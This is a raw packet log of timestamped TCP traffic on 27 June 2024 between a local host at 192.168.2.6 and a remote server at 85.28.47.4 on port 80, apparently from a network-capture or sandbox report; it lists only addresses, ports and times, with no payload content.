                                                                Jun 27, 2024 05:58:11.352163076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352164030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352175951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352188110 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352188110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352200031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352201939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352210999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352217913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352247953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353079081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353092909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353104115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353111029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353120089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353122950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353137016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353144884 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353147984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353159904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353169918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353172064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353183985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353185892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353195906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353202105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353207111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353219986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353226900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353233099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.353254080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.353269100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438256025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438292027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438304901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438374043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438395023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438405991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438406944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438417912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438426971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438430071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438453913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438478947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438572884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438585043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438596010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438608885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438636065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438827038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438838005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438848972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438854933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438859940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438860893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438879967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438890934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438891888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438901901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438914061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438924074 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438925028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438936949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438941002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438947916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438958883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.438977957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.438997984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439338923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439378977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439508915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439521074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439531088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439543009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439548969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439554930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439565897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439567089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439578056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439589024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439594984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439600945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439610004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439614058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439639091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439661980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.439945936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439956903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439966917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439980030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.439987898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440011978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440186977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440200090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440208912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440220118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440229893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440241098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440247059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440253019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440263987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440274000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440277100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440289021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440299034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440299988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440316916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440329075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440329075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440345049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440368891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440922022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440934896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440944910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440957069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440968037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440968990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.440979004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440989971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.440994978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441001892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441015005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441023111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441025972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441037893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441044092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441050053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441054106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441066980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441071987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441078901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441091061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441102982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441108942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441123962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441138983 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441848993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441860914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441870928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441881895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441894054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441900969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441905975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441917896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441929102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441931009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441941023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441951990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441952944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441966057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441970110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441977024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441987038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.441988945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.441998005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442009926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442013025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442022085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442034006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442044020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442837954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442856073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442866087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442867994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442881107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442883968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442893028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442904949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442917109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442924976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442929029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442939997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442950964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442950964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442961931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442967892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442972898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442984104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.442989111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.442996025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443006992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443012953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.443017960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443030119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443041086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443042994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.443072081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.443083048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.443727970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443741083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443751097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443763018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443773985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443784952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443789005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.443797112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443809032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443820000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443831921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.443831921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.443855047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.443870068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525228024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525280952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525294065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525307894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525368929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525382042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525394917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525464058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525464058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525509119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525520086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525531054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525543928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525548935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525578022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525696039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525707960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525717974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525734901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525854111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525865078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.525877953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525888920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.525913954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526015997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526027918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526061058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526168108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526180029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526190042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526201010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526202917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526212931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526223898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526235104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526235104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526247025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526259899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526268005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526273012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526284933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526310921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526582003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526592970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526603937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526617050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526618958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526637077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526663065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526792049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526803970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526814938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526825905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526827097 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526838064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.526844025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.526871920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527067900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527079105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527091026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527100086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527111053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527122974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527128935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527134895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527146101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527157068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527157068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527169943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527174950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527182102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527192116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527201891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527214050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527218103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527226925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527249098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527265072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527872086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527883053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527894020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527904987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527909994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527915955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527929068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527935982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527940035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527951002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527951002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527962923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527975082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527981997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.527986050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.527997017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528006077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.528008938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528021097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528028011 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.528033972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528043985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.528047085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528059006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528069973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.528095961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.528932095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528944969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528955936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528966904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528973103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.528978109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528989077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.528990030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529000998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529011965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529023886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529026031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529036999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529047012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529047966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529068947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529069901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529081106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529093981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529097080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529104948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529117107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529118061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529129982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529141903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529145002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529158115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529160976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529186964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529206038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529810905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529823065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529831886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529844046 CEST804971185.28.47.4192.168.2.6
